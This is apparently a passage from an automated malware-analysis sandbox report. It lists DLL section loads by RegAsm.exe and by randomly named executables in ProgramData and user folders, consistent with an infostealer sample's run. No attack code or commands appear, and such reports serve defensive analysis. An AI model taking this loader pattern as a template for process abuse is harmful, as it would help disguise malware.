Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\KECBKKEBKE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\EGDGCGCFHI.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\ProgramData\DBGIJEHIID.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mozglue.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wsock32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: mscoree.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: apphelp.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: version.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userGIEGHJEGHJ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: mscoree.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: apphelp.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: version.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\userIJEGDBGDBF.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
